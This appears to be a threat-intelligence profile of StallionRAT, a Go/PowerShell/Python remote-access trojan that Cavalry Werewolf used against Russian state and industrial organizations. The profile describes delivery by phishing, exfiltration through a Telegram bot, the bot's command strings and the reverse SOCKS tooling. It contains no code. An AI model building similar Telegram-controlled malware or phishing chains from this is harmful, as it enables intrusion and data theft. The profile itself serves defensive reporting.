StallionRAT

StallionRAT is a malware family used in campaigns reported by BI.ZONE and attributed to the threat actor it tracks as Cavalry Werewolf, which overlaps with YoroTrooper and several other clusters, including Tomiris. The activity was observed between May and August 2025 and targeted the Russian public sector, including state agencies and organizations in the energy, mining, and manufacturing sectors. Initial access was achieved through targeted phishing emails impersonating Kyrgyz government officials; the emails delivered RAR archives that installed StallionRAT, and in at least one case the actor used a compromised legitimate email account associated with the Kyrgyz Republic’s regulatory authority.

According to the provided content, StallionRAT is written in Go, PowerShell, and Python. It enables attackers to execute arbitrary commands, load additional files, and exfiltrate collected data. Data exfiltration is performed via a Telegram bot. Reported Telegram bot commands include /list, /go [DeviceID] [command], and /upload [DeviceID], with the /go command executing supplied commands via Invoke-Expression. The operators also executed commands to gather device information on compromised hosts. Tools observed alongside this activity included ReverseSocks5Agent and ReverseSocks5, indicating use of reverse proxy capability on compromised systems.

High-confidence indicators and artifacts directly mentioned in the content include delivery via RAR archives, use of Telegram bot command strings such as /list, /go [DeviceID] [command], and /upload [DeviceID], and association with filenames in English and Arabic observed by BI.ZONE. BI.ZONE further assessed that Cavalry Werewolf’s ties to Tomiris support a hypothesis of Kazakhstan affiliation, consistent with Microsoft’s prior attribution of Tomiris to the Kazakhstan-based actor Storm-0473.